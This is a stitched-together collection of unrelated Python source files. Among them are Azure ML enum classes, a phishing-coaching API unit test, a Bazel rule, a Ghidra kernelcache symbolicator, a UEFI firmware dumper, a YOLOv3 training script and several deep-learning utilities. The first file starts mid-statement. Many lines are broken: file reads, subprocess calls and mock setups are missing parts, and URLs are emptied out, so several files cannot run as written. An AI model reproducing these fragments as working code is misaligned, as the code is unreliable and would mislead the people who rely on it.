"Steady" RESIZING = "Resizing" class ApplicationSharingPolicy(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Policy for sharing applications on this compute instance among users of parent workspace. If Personal, only the creator can access applications on this compute instance. When Shared, any workspace user can access applications on this instance depending on his/her assigned role. """ PERSONAL = "Personal" SHARED = "Shared" class BillingCurrency(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Three lettered code specifying the currency of the VM price. Example: USD """ USD = "USD" class ComputeInstanceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Current state of a ComputeInstance. """ CREATING = "Creating" CREATE_FAILED = "CreateFailed" DELETING = "Deleting" RUNNING = "Running" RESTARTING = "Restarting" JOB_RUNNING = "JobRunning" SETTING_UP = "SettingUp" SETUP_FAILED = "SetupFailed" STARTING = "Starting" STOPPED = "Stopped" STOPPING = "Stopping" USER_SETTING_UP = "UserSettingUp" USER_SETUP_FAILED = "UserSetupFailed" UNKNOWN = "Unknown" UNUSABLE = "Unusable" class ComputeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The type of compute """ AKS = "AKS" AML_COMPUTE = "AmlCompute" COMPUTE_INSTANCE = "ComputeInstance" DATA_FACTORY = "DataFactory" VIRTUAL_MACHINE = "VirtualMachine" HD_INSIGHT = "HDInsight" DATABRICKS = "Databricks" DATA_LAKE_ANALYTICS = "DataLakeAnalytics" class EncryptionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Indicates whether or not the encryption is enabled for the workspace. """ ENABLED = "Enabled" DISABLED = "Disabled" class NodeState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """State of the compute node. Values are idle, running, preparing, unusable, leaving and preempted. """ IDLE = "idle" RUNNING = "running" PREPARING = "preparing" UNUSABLE = "unusable" LEAVING = "leaving" PREEMPTED = "preempted" class OperationName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Name of the last operation. """ CREATE = "Create" START = "Start" STOP = "Stop" RESTART = "Restart" REIMAGE = "Reimage" DELETE = "Delete" class OperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Operation status. """ IN_PROGRESS = "InProgress" SUCCEEDED = "Succeeded" CREATE_FAILED = "CreateFailed" START_FAILED = "StartFailed" STOP_FAILED = "StopFailed" RESTART_FAILED = "RestartFailed" REIMAGE_FAILED = "ReimageFailed" DELETE_FAILED = "DeleteFailed" class PrivateEndpointConnectionProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The current provisioning state. """ SUCCEEDED = "Succeeded" CREATING = "Creating" DELETING = "Deleting" FAILED = "Failed" class PrivateEndpointServiceConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The private endpoint connection status. """ PENDING = "Pending" APPROVED = "Approved" REJECTED = "Rejected" DISCONNECTED = "Disconnected" TIMEOUT = "Timeout" class ProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The current deployment state of workspace resource. The provisioningState is to indicate states for resource provisioning. """ UNKNOWN = "Unknown" UPDATING = "Updating" CREATING = "Creating" DELETING = "Deleting" SUCCEEDED = "Succeeded" FAILED = "Failed" CANCELED = "Canceled" class QuotaUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """An enum describing the unit of quota measurement. """ COUNT = "Count" class ReasonCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The reason for the restriction. """ NOT_SPECIFIED = "NotSpecified" NOT_AVAILABLE_FOR_REGION = "NotAvailableForRegion" NOT_AVAILABLE_FOR_SUBSCRIPTION = "NotAvailableForSubscription" class RemoteLoginPortPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh port is closed on all nodes of the cluster. Enabled - Indicates that the public ssh port is open on all nodes of the cluster. NotSpecified - Indicates that the public ssh port is closed on all nodes of the cluster if VNet is defined, else is open all public nodes. It can be default only during cluster creation time, after creation it will be either enabled or disabled. """ ENABLED = "Enabled" DISABLED = "Disabled" NOT_SPECIFIED = "NotSpecified" class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The identity type. """ SYSTEM_ASSIGNED = "SystemAssigned" USER_ASSIGNED = "UserAssigned" SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned,UserAssigned" NONE = "None" class SshPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh port is closed on this instance. Enabled - Indicates that the public ssh port is open and accessible according to the VNet/subnet policy if applicable. """ ENABLED = "Enabled" DISABLED = "Disabled" class SslConfigurationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Enable or disable ssl for scoring """ DISABLED = "Disabled" ENABLED = "Enabled" class Status(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Status of update workspace quota. """ UNDEFINED = "Undefined" SUCCESS = "Success" FAILURE = "Failure" INVALID_QUOTA_BELOW_CLUSTER_MINIMUM = "InvalidQuotaBelowClusterMinimum" INVALID_QUOTA_EXCEEDS_SUBSCRIPTION_LIMIT = "InvalidQuotaExceedsSubscriptionLimit" INVALID_VM_FAMILY_NAME = "InvalidVMFamilyName" OPERATION_NOT_SUPPORTED_FOR_SKU = "OperationNotSupportedForSku" OPERATION_NOT_ENABLED_FOR_REGION = "OperationNotEnabledForRegion" class UnderlyingResourceAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): DELETE = "Delete" DETACH = "Detach" class UnitOfMeasure(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The unit of time measurement for the specified VM price. Example: OneHour """ ONE_HOUR = "OneHour" class UsageUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """An enum describing the unit of usage measurement. """ COUNT = "Count" class VMPriceOSType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Operating system type used by the VM. """ LINUX = "Linux" WINDOWS = "Windows" class VmPriority(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Virtual Machine priority """ DEDICATED = "Dedicated" LOW_PRIORITY = "LowPriority" class VMTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """The type of the VM. """ STANDARD = "Standard" LOW_PRIORITY = "LowPriority" SPOT = "Spot"
<reponame>diCagri/content<filename>Packs/SecurityAdvisor/Integrations/SecurityAdvisor/ import SecurityAdvisor URL_SUFFIX = 'apis/coachuser/' BASE_URL = '' CONTEXT_JSON = { "SecurityAdvisor.CoachUser": { "coaching_date": "2019-10-04T21:04:19.480425", "coaching_status": "Pending", "coaching_score": "", "user": "<EMAIL>", "context": "phishing", "message": "Coaching Sent" } } RESPONSE_JSON = { "coaching_date": "2019-10-04T21:04:19.480425", "coaching_status": "Pending", "coaching_score": "", "user": "<EMAIL>", "context": "phishing", "message": "Coaching Sent" } HEADERS = { 'Content-Type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Token ' + '<PASSWORD>' } def test_coach_end_user_command(requests_mock): """Unit test for coach-end-user command Args: requests_mock ([type]): [description] """ mock_reponse = RESPONSE_JSON + URL_SUFFIX, json=mock_reponse) client = SecurityAdvisor.Client( base_url=BASE_URL, verify=False, proxy=False, headers=HEADERS ) args = {"user": "<EMAIL>", "context": "phishing"} _, _, result = SecurityAdvisor.coach_end_user_command(client, args) assert result == RESPONSE_JSON def test_module_command(requests_mock): """Unit test for test-module command Args: requests_mock ([type]): [description] """ mock_reponse = RESPONSE_JSON + URL_SUFFIX, json=mock_reponse) client = SecurityAdvisor.Client( base_url=BASE_URL, verify=False, proxy=False, headers=HEADERS ) response = SecurityAdvisor.test_module(client) assert response == "ok"
<filename>python/py_gapic_repositories.bzl<gh_stars>100-1000 # Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") _BLACK_PY_BUILD_FILE = """ py_binary( name = "black", srcs = glob(["**/*.py"]), visibility = ["//visibility:public"], ) """ def py_gapic_repositories(): _maybe( http_archive, name = "pypi_black", strip_prefix = "black-19.3b0", urls = [""], build_file_content = _BLACK_PY_BUILD_FILE, ) def _maybe(repo_rule, name, strip_repo_prefix = "", **kwargs): if not name.startswith(strip_repo_prefix): return repo_name = name[len(strip_repo_prefix):] if repo_name in native.existing_rules(): return repo_rule(name = repo_name, **kwargs)
# Symbolicate the kernelcache from jtool2 #@author simo #@category iOS.kernel from utils.methods import * if __name__ == "__main__": default_file = "test" fname = askString("Kernelcache symbol file","Symbol file: ",default_file) f = open(fname,"rb+") buf ='\n') i = 0 for line in buf: if len(line) == 0: continue addr , symbol , empty = line.split("|") if len(symbol) == 0: continue if "func_" in symbol: continue print addr,symbol symbol = symbol.strip()#.replace(" ","_") symbolicate(addr,symbol) i+= 1
<filename>tools/<gh_stars>100-1000 # SPDX-License-Identifier: MIT import glob import os import pathlib import re import shutil import colorama import uefi_firmware from .guid_db import UEFI_GUIDS DIR_NAME = "all" PE_DIR = "modules" g_re_guid = re.compile( r"file-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" ) class Dumper: def __init__(self, fw_name, dir_name, pe_dir): self.fw_name = fw_name self.dir_name = dir_name self.pe_dir = pe_dir self.modules = list() if not os.path.isdir(self.dir_name): os.mkdir(self.dir_name) if not os.path.isdir(self.pe_dir): os.mkdir(self.pe_dir) @staticmethod def _unsupported() -> bool: print("[-] This type of binary is not supported") return False def get_unique_name(self, module_name: str) -> str: # Get unique name, see index = 1 unique_name = module_name while True: if unique_name in self.modules: unique_name = f"{module_name}_{index:#d}" index += 1 continue return unique_name def get_module_name(self, module_path: str) -> str: module_name = str() dir_name, _ = os.path.split(module_path) template = os.path.join(dir_name, "*.ui") if len(glob.glob(template)) == 1: # try to get a friendly name from the *.ui file ui_path = glob.glob(template)[0] with open(ui_path, "rb") as f: module_name = module_name = module_name.decode("utf-16le") module_name = self.get_unique_name(module_name[:-1]) self.modules.append(module_name) return module_name # no UI section, try to get a friendly name from the GUID database file_guids = g_re_guid.findall(dir_name) if not file_guids: return str() module_guid = file_guids[-1].replace("file-", "") module_name = UEFI_GUIDS.get(module_guid.upper()) if not module_name: module_name = module_guid module_name = self.get_unique_name(module_name) self.modules.append(module_name) return module_name @staticmethod def search_pe(d: str) -> list: return list(map(str, pathlib.Path(d).rglob("*.pe"))) @staticmethod def search_te(d: str) -> list: return list(map(str, pathlib.Path(d).rglob("*.te"))) def get_pe_files(self): pe_files = self.search_pe(self.dir_name) te_files = self.search_te(self.dir_name) for module_path in te_files + pe_files: module_name = self.get_module_name(module_path) if not module_name: print(f"Current module: unknown") continue print(f"Current module: {module_name}") dst = os.path.join(self.pe_dir, module_name) shutil.copy(module_path, dst) def dump_all(self) -> bool: if not os.path.isfile(self.fw_name): print(f"[-] Check {self.fw_name} file") return False with open(self.fw_name, "rb") as fw: file_content = parser = uefi_firmware.AutoParser(file_content) if parser.type() is "unknown": fvh_index = file_content.find(b"_FVH") if fvh_index < 0: return self._unsupported() parser = uefi_firmware.AutoParser(file_content[fvh_index - 40 :]) if parser.type() is "unknown": return self._unsupported() firmware = parser.parse() firmware.dump(self.dir_name) return True def get_efi_images(fw_name) -> bool: """get images from firmware""" colorama.init(autoreset=True) # for correct color display in uefi_firmware module dumper = Dumper(fw_name, DIR_NAME, PE_DIR) if not dumper.dump_all(): exit() dumper.get_pe_files() return True
<filename> import tensorflow as tf import numpy as np import os import utils.tfrecord_voc_utils as voc_utils import YOLOv3 as yolov3 # import matplotlib.pyplot as plt # import matplotlib.patches as patches # from skimage import io, transform from utils.voc_classname_encoder import classname_to_ids os.environ['CUDA_VISIBLE_DEVICES'] = '0' lr = 0.001 batch_size = 12 buffer_size = 256 epochs = 160 reduce_lr_epoch = [] config = { 'mode': 'train', # 'train', 'test' 'data_shape': [448, 448, 3], 'num_classes': 20, 'weight_decay': 5e-4, 'keep_prob': 0.5, # not used 'data_format': 'channels_last', # 'channels_last' 'channels_first' 'batch_size': batch_size, 'coord_scale': 1, 'noobj_scale': 1, 'obj_scale': 5., 'class_scale': 1., 'num_priors': 3, 'nms_score_threshold': 0.5, 'nms_max_boxes': 10, 'nms_iou_threshold': 0.5, 'priors': [[[10., 13.], [16, 30.], [33., 23.]], [[30., 61.], [62., 45.], [59., 119.]], [[116., 90.], [156., 198.], [373.,326.]]] } image_augmentor_config = { 'data_format': 'channels_last', 'output_shape': [448, 448], # 'zoom_size': [520, 520], # 'crop_method': 'random', 'flip_prob': [0., 0.5], 'fill_mode': 'BILINEAR', 'keep_aspect_ratios': False, 'constant_values': 0., # 'color_jitter_prob': 0.5, # 'rotate': [0.5, -10., 10.], 'pad_truth_to': 60, } data = os.listdir('./voc2007/') data = [os.path.join('./voc2007/', name) for name in data] train_gen = voc_utils.get_generator(data, batch_size, buffer_size, image_augmentor_config) trainset_provider = { 'data_shape': [448, 448, 3], 'num_train': 5011, 'num_val': 0, # not used 'train_generator': train_gen, 'val_generator': None # not used } testnet = yolov3.YOLOv3(config, trainset_provider) testnet.load_weight('./weight/test-40449') for i in range(epochs): print('-'*25, 'epoch', i, '-'*25) if i in reduce_lr_epoch: lr = lr/10. print('reduce lr, lr=', lr, 'now') mean_loss = testnet.train_one_epoch(lr) print('>> mean loss', mean_loss) testnet.save_weight('latest', './weight/test') # 'latest', 'best' # img = io.imread() # img = transform.resize(img, [448,448]) # img = np.expand_dims(img, 0) # result = testnet.test_one_image(img) # id_to_clasname = {k:v for (v,k) in classname_to_ids.items()} # scores = result[0] # bbox = result[1] # class_id = result[2] # print(scores, bbox, class_id) # plt.figure(1) # plt.imshow(np.squeeze(img)) # axis = plt.gca() # for i in range(len(scores)): # rect = patches.Rectangle((bbox[i][1],bbox[i][0]), bbox[i][3]-bbox[i][1],bbox[i][2]-bbox[i][0],linewidth=2,edgecolor='b',facecolor='none') # axis.add_patch(rect) # plt.text(bbox[i][1],bbox[i][0], id_to_clasname[class_id[i]]+str(' ')+str(scores[i]), color='red', fontsize=12) #
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import theano import theano.tensor as T from deepy.layers import NeuralLayer class WordEmbedding(NeuralLayer): """ Word embedding layer. The word embeddings are randomly initialized, and are learned over the time. """ def __init__(self, size, vocab_size, zero_index=None, mask=None, load_values=None, init=None): from deepy.core.neural_var import NeuralVariable super(WordEmbedding, self).__init__("word_embed") self.size = size self.vocab_size = vocab_size self.output_dim = size self.zero_index = zero_index self._mask = mask.tensor if type(mask) == NeuralVariable else mask self._init = init self._load_values = load_values self.init(1) def prepare(self): if self._load_values is not None: self.embed_matrix = theano.shared(self._load_values, name="embeddings") else: self.embed_matrix = self.create_weight(self.vocab_size, self.size, "embeddings", initializer=self._init) self.register_parameters(self.embed_matrix) def compute_tensor(self, x, mask=None): mask = mask if mask else self._mask if self.zero_index is not None: mask = T.neq(x, self.zero_index) # To avoid negative index x = T.cast(x * mask, "int32") if x.ndim == 1: ret_tensor = self.embed_matrix[x] else: ret_tensor = self.embed_matrix[x.flatten()].reshape(list(x.shape) + [self.size]) if mask: if x.ndim == 2: ret_tensor *= mask[:, :, None] elif x.ndim == 1: ret_tensor *= mask[:, None] return ret_tensor
<filename>tests/scripts/unicode💩.py<gh_stars>1000+ #!/env/bin/python # -*- coding: utf-8 -*- import time def function1(seconds): time.sleep(seconds) if __name__ == "__main__": function1(100)
# Copyright (c) OpenMMLab. All rights reserved. import mmocr.utils as utils import torch import torch.nn.functional as F from mmdeploy.core import FUNCTION_REWRITER @FUNCTION_REWRITER.register_rewriter( func_name='mmocr.models.textrecog.encoders.SAREncoder.forward', backend='default') def sar_encoder__forward(ctx, self, feat, img_metas=None): """Rewrite `forward` of SAREncoder for default backend. Rewrite this function to: 1. convert tuple value of feat.size to int, making model exportable. 2. use torch.ceil to replace original math.ceil and if else in mmocr. Args: ctx (ContextCaller): The context with additional information. self: The instance of the class SAREncoder. feat (Tensor): Encoded feature map of shape (N, C, H, W). img_metas (Optional[list[dict]]): A list of image info dict where each dict has: 'img_shape', 'scale_factor', 'flip', and may also contain 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. For details on the values of these keys, see :class:`mmdet.datasets.pipelines.Collect`. Returns: holistic_feat (Tensor): A feature map output from SAREncoder. The shape [N, M]. """ if img_metas is not None: assert utils.is_type_list(img_metas, dict) assert len(img_metas) == feat.size(0) valid_ratios = None if img_metas is not None: valid_ratios = [ img_meta.get('valid_ratio', 1.0) for img_meta in img_metas ] if self.mask else None h_feat = int(feat.size(2)) feat_v = F.max_pool2d(feat, kernel_size=(h_feat, 1), stride=1, padding=0) feat_v = feat_v.squeeze(2) # bsz * C * W feat_v = feat_v.permute(0, 2, 1).contiguous() # bsz * W * C holistic_feat = self.rnn_encoder(feat_v)[0] # bsz * T * C if valid_ratios is not None: valid_hf = [] T = holistic_feat.size(1) for i, valid_ratio in enumerate(valid_ratios): # use torch.ceil to replace original math.ceil and if else in mmocr valid_step = torch.ceil(T * valid_ratio).long() - 1 valid_hf.append(holistic_feat[i, valid_step, :]) valid_hf = torch.stack(valid_hf, dim=0) else: valid_hf = holistic_feat[:, -1, :] # bsz * C holistic_feat = self.linear(valid_hf) # bsz * C return holistic_feat
import json import os from jinja2 import Template from chronologer.config import config def write_html(): html_file = os.path.join(os.path.dirname(__file__), "templates", "index.html") with open(html_file) as fp: html_template = Template( if not config.dry_run: boxplot_spec = json.dumps(_get_boxplot_spec(), indent=2) with open(config.html_output_file, "w") as fp: fp.write(html_template.render(boxplot_spec=boxplot_spec)) def _get_boxplot_spec(): with open(config.combined_benchmark_file) as fp: values = json.load(fp) return { "$schema": "", "data": {"values": values}, "mark": {"type": "boxplot", "extent": "min-max", "size": 5}, "width": 1400, "height": 500, "encoding": { "y": {"field": "time", "type": "quantitative", "axis": {"title": "Time"}}, "x": { "field": "commit", "type": "ordinal", "axis": {"title": "Commit", "labels": False, "ticks": False}, }, "tooltip": {"field": "message", "type": "ordinal", "aggregate": "min"}, }, }
<reponame>aiuto/google-apis-client-generator #!/usr/bin/python2.7 """Foundary for getting a package writer.""" from googleapis.codegen.filesys import filesystem_library_package from googleapis.codegen.filesys import single_file_library_package from googleapis.codegen.filesys import tar_library_package from googleapis.codegen.filesys import zip_library_package def GetPackageWriter(output_dir=None, output_file=None, output_format='zip'): """Get an output writer for a package.""" if not (output_dir or output_file): raise ValueError( 'GetPackageWriter requires either output_dir or output_file') if output_dir and output_file: raise ValueError( 'GetPackageWriter requires only one of output_dir or output_file') if output_dir: package_writer = filesystem_library_package.FilesystemLibraryPackage( output_dir) else: out = open(output_file, 'w') if output_format == 'tgz': package_writer = tar_library_package.TarLibraryPackage(out) elif output_format == 'tar': package_writer = tar_library_package.TarLibraryPackage(out, compress=False) elif output_format == 'txt': package_writer = single_file_library_package.SingleFileLibraryPackage(out) else: package_writer = zip_library_package.ZipLibraryPackage(out) return package_writer
<filename>bindings/python/examples/ """ Simple program to demonstrate how to use muniverse on a game that takes mouse events. """ import sys import numpy as np sys.path.insert(0, '..') import muniverse # noqa: E402 def main(): print('Looking up environment...') spec = muniverse.spec_for_name('TowerMania-v1') print('Creating environment...') env = muniverse.Env(spec) try: print('Resetting environment...') env.reset() print('Getting observation...') obs = env.observe() print(ascii_art(obs)) print('Playing game...') step_idx = 0 action = muniverse.MouseAction('mousePressed', x=100, y=100, click_count=1) actions = [action, action.with_event('mouseReleased')] while True: reward, done = env.step(0.1, actions[step_idx % 2]) step_idx += 1 print('reward: ' + str(reward)) if done: break finally: env.close() def ascii_art(img): brightness = np.sum(img, axis=2) / 3 downsampled = brightness[::14, ::7] binary = downsampled > 128 height, width = binary.shape res = '' for y in range(0, height): if res != '': res += '\n' for x in range(0, width): if binary[y, x]: res += 'X' else: res += ' ' return res if __name__ == '__main__': main()
# -*- coding: utf-8 -*- # (c) University of Strathclyde 2021 # Author: <NAME> # # Contact: <EMAIL> # # <NAME>, # Strathclyde Institute for Pharmacy and Biomedical Sciences, # Cathedral Street, # Glasgow, # G4 0RE # Scotland, # UK # # The MIT License # # Copyright (c) 2021 University of Strathclyde # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """Code to implement the ANIblastall average nucleotide identity method.""" import logging import os import platform import re import shutil import subprocess from pathlib import Path from . import pyani_config from . import PyaniException class PyaniblastallException(PyaniException): """ANIblastall-specific exception for pyani.""" def get_version(blast_exe: Path = pyani_config.BLASTALL_DEFAULT) -> str: r"""Return BLAST blastall version as a string. :param blast_exe: path to blastall executable We expect blastall to return a string as, for example .. code-block:: bash $ blastall -version [blastall 2.2.26] ERROR: Number of database sequences to show \ one-line descriptions for (V) [ersion] is bad or out of range [? to ?] This is concatenated with the OS name. The following circumstances are explicitly reported as strings - no executable at passed path - non-executable file at passed path (this includes cases where the user doesn't have execute permissions on the file) - no version info returned - executable cannot be run on this OS """ logger = logging.getLogger(__name__) try: blastall_path = Path(shutil.which(blast_exe)) # type:ignore except TypeError: return f"{blast_exe} is not found in $PATH" if not blastall_path.is_file(): # no executable return f"No blastall at {blastall_path}" # This should catch cases when the file can't be executed by the user if not os.access(blastall_path, os.X_OK): # file exists but not executable return f"blastall exists at {blastall_path} but not executable" if platform.system() == "Darwin": cmdline = [blast_exe, "-version"] else: cmdline = [blast_exe] try: result = cmdline, # type: ignore shell=False, stdout=subprocess.PIPE, # type: ignore stderr=subprocess.PIPE, check=False, # blastall doesn't return 0 ) except OSError: logger.warning("blastall executable will not run", exc_info=True) return f"blastall exists at {blastall_path} but could not be executed" version = # type: ignore r"(?<=blastall\s)[0-9\.]*", str(result.stderr, "utf-8") ).group() if 0 == len(version.strip()): return f"blastall exists at {blastall_path} but could not retrieve version" return f"{platform.system()}_{version} ({blastall_path})"
# Generated by Django 2.1.2 on 2018-12-16 13:01 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('vespene', '0008_auto_20181106_2233'), ] operations = [ migrations.RemoveField( model_name='workerpool', name='sudo_password', ), ]
import autosar ws = autosar.workspace("4.2.2") components = ws.createPackage("ComponentTypes") swc = components.createCompositionComponent("MyComposition") print(
import pytest from onegram.exceptions import NotSupportedError from onegram import follow, unfollow from onegram import like, unlike from onegram import comment, uncomment from onegram import save, unsave def test_follow(logged, user, cassette): if logged: response = follow(user) assert response == {'result': 'following', 'status': 'ok', 'user_id': user['id']} response = unfollow(user) assert response == {'status': 'ok', 'user_id': user['id']} else: with pytest.raises(NotSupportedError): follow(user) with pytest.raises(NotSupportedError): unfollow(user) def test_like(logged, post, cassette): if logged: response = like(post) assert response == {'status': 'ok', 'post_id': post['id']} response = unlike(post) assert response == {'status': 'ok', 'post_id': post['id']} else: with pytest.raises(NotSupportedError): like(post) with pytest.raises(NotSupportedError): unlike(post) def test_comment(logged, post, cassette): text = 'awesome!' if logged: commentary = comment(text, post) assert commentary['id'] assert commentary['text'] == text assert commentary['status'] == 'ok' assert commentary['post_id'] == post['id'] response = uncomment(commentary) assert response == {'status': 'ok', 'post_id': post['id']} else: with pytest.raises(NotSupportedError): comment(text, post) with pytest.raises(NotSupportedError): fake_comment = {'id': '1', 'post_id': '2'} uncomment(fake_comment) def test_save(logged, post, cassette): if logged: response = save(post) assert response == {'status': 'ok', 'post_id': post['id']} response = unsave(post) assert response == {'status': 'ok', 'post_id': post['id']} else: with pytest.raises(NotSupportedError): save(post) with pytest.raises(NotSupportedError): unsave(post)
from __future__ import print_function import minpy.numpy as mp import numpy as np import minpy.dispatch.policy as policy from minpy.core import convert_args, return_numpy, grad_and_loss, grad, minpy_to_numpy as mn, numpy_to_minpy as nm import time # mp.set_policy(policy.OnlyNumPyPolicy()) def test_autograd(): @convert_args def minpy_rnn_step_forward(x, prev_h, Wx, Wh, b): next_h = mp.tanh( + + b) return next_h def rel_error(x, y): """ returns relative error """ return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y)))) def rnn_step_forward(x, prev_h, Wx, Wh, b): next_h = np.tanh( + + b) cache = next_h, prev_h, x, Wx, Wh return next_h, cache def rnn_step_backward(dnext_h, cache): dx, dprev_h, dWx, dWh, db = None, None, None, None, None # Load values from rnn_step_forward next_h, prev_h, x, Wx, Wh = cache # Gradients of loss wrt tanh dtanh = dnext_h * (1 - next_h * next_h) # (N, H) # Gradients of loss wrt x dx = # Gradients of loss wrt prev_h dprev_h = # Gradients of loss wrt Wx dWx = # (D, H) # Gradients of loss wrt Wh dWh = # Gradients of loss wrt b. Note we broadcast b in practice. Thus result of # matrix ops are just sum over columns db = dtanh.sum(axis=0) # == np.ones([N, 1])[0, :] return dx, dprev_h, dWx, dWh, db # preparation N, D, H = 4, 5, 6 x = np.random.randn(N, D) h = np.random.randn(N, H) Wx = np.random.randn(D, H) Wh = np.random.randn(H, H) b = np.random.randn(H) out, cache = rnn_step_forward(x, h, Wx, Wh, b) dnext_h = np.random.randn(*out.shape) # test MinPy start = time.time() rnn_step_forward_loss = lambda x, h, Wx, Wh, b, dnext_h: minpy_rnn_step_forward(x, h, Wx, Wh, b) * nm(dnext_h) grad_loss_function = return_numpy(grad_and_loss(rnn_step_forward_loss, range(5))) grad_arrays = grad_loss_function(x, h, Wx, Wh, b, dnext_h)[0] end = time.time() print("MinPy total time elapsed:", end - start) # test NumPy start = time.time() out, cache = rnn_step_forward(x, h, Wx, Wh, b) dx, dprev_h, dWx, dWh, db = rnn_step_backward(dnext_h, cache) out *= dnext_h # to agree with MinPy calculation end = time.time() print("NumPy total time elapsed:", end - start) print() print("Result Check:") print('dx error: ', rel_error(dx, grad_arrays[0])) print('dprev_h error: ', rel_error(dprev_h, grad_arrays[1])) print('dWx error: ', rel_error(dWx, grad_arrays[2])) print('dWh error: ', rel_error(dWh, grad_arrays[3])) print('db error: ', rel_error(db, grad_arrays[4])) def test_zero_input_grad(): def foo1(x): return 1 bar1 = grad(foo1) assert bar1(0) == 0.0 def test_reduction(): def test_sum(): x_np = np.array([[1, 2], [3, 4], [5, 6]]) x_grad = np.array([[1, 1], [1, 1], [1, 1]]) def red1(x): return mp.sum(x) def red2(x): return mp.sum(x, axis=0) def red3(x): return mp.sum(x, axis=0, keepdims=True) grad1 = grad(red1) assert np.all(grad1(x_np).asnumpy() == x_grad) grad2 = grad(red2) assert np.all(grad2(x_np).asnumpy() == x_grad) grad3 = grad(red3) assert np.all(grad3(x_np).asnumpy() == x_grad) def test_max(): x_np = np.array([[1, 2], [2, 1], [0, 0]]) x_grad1 = np.array([[0, 1], [1, 0], [0, 0]]) x_grad2 = np.array([[0, 1], [1, 0], [1, 1]]) x_grad3 = np.array([[0, 1], [1, 0], [0, 0]]) def red1(x): return mp.max(x) def red2(x): return mp.max(x, axis=1) def red3(x): return mp.max(x, axis=1, keepdims=True) def red4(x): return mp.max(x, axis=0) def red5(x): return mp.max(x, axis=0, keepdims=True) grad1 = grad(red1) assert np.all(grad1(x_np).asnumpy() == x_grad1) grad2 = grad(red2) assert np.all(grad2(x_np).asnumpy() == x_grad2) grad3 = grad(red3) assert np.all(grad3(x_np).asnumpy() == x_grad2) grad4 = grad(red4) assert np.all(grad4(x_np).asnumpy() == x_grad3) grad5 = grad(red5) assert np.all(grad5(x_np).asnumpy() == x_grad3) def test_min(): x_np = np.array([[1, 2], [2, 1], [0, 0]]) x_grad1 = np.array([[0, 0], [0, 0], [1, 1]]) x_grad2 = np.array([[1, 0], [0, 1], [1, 1]]) x_grad3 = np.array([[0, 0], [0, 0], [1, 1]]) def red1(x): return mp.min(x) def red2(x): return mp.min(x, axis=1) def red3(x): return mp.min(x, axis=1, keepdims=True) def red4(x): return mp.min(x, axis=0) def red5(x): return mp.min(x, axis=0, keepdims=True) grad1 = grad(red1) assert np.all(grad1(x_np).asnumpy() == x_grad1) grad2 = grad(red2) assert np.all(grad2(x_np).asnumpy() == x_grad2) grad3 = grad(red3) assert np.all(grad3(x_np).asnumpy() == x_grad2) grad4 = grad(red4) assert np.all(grad4(x_np).asnumpy() == x_grad3) grad5 = grad(red5) assert np.all(grad5(x_np).asnumpy() == x_grad3) test_sum() test_max() test_min() if __name__ == "__main__": test_autograd() test_zero_input_grad() test_reduction()
<filename>pymoo/model/ from abc import abstractmethod class Repair: """ This class is allows to repair individuals after crossover if necessary. """ def do(self, problem, pop, **kwargs): return self._do(problem, pop, **kwargs) @abstractmethod def _do(self, problem, pop, **kwargs): pass class NoRepair(Repair): """ A dummy class which can be used to simply do no repair. """ def do(self, problem, pop, **kwargs): return pop
